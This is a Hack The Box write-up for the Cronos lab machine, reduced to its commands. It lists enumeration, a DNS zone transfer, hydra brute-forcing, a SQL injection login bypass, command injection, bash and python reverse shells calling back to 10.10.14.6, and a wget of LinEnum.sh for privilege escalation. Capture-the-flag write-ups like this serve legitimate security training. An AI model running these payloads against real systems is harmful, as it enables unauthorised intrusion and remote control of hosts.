Hack The Box — Cronos Writeup w/o Metasploit

Rana Khalil
Oct 25, 2019 · 10 min read

Reconnaissance

nmap -sC -sV -O -oA initial 10.10.10.13
nmap -sC -sV -O -p- -oA full 10.10.10.13
nmap -sU -O -p- -oA udp 10.10.10.13

Enumeration

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.13
10.10.10.13 cronos.htb
host -l <domain-name> <dns_server-address>
host -l cronos.htb 10.10.10.13
10.10.10.13 cronos.htb www.cronos.htb admin.cronos.htb

Gaining an Initial Foothold

locate password | grep john
wc -l /usr/share/john/password.lst
hydra -l 'admin' -P /usr/share/john/password.lst admin.cronos.htb http-post-form "/:username=^USER^&password=^PASS^&Login=Login:Your Login Name or Password is invalid"
admin' #
sqlmap -v 4 -r login.txt
8.8.8.8 & whoami
/bin/bash -i >& /dev/tcp/10.10.14.6/4444 0>&1
nc -nlvp 4444
which bash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.6",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import pty; pty.spawn("/bin/bash")'
stty raw -echo

Privilege Escalation

python -m SimpleHTTPServer 5555
cd /tmp
wget http://10.10.14.6:5555/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
cp php-reverse-shell.php artisan
nc -nlvp 1234

Lessons Learned

Conclusion

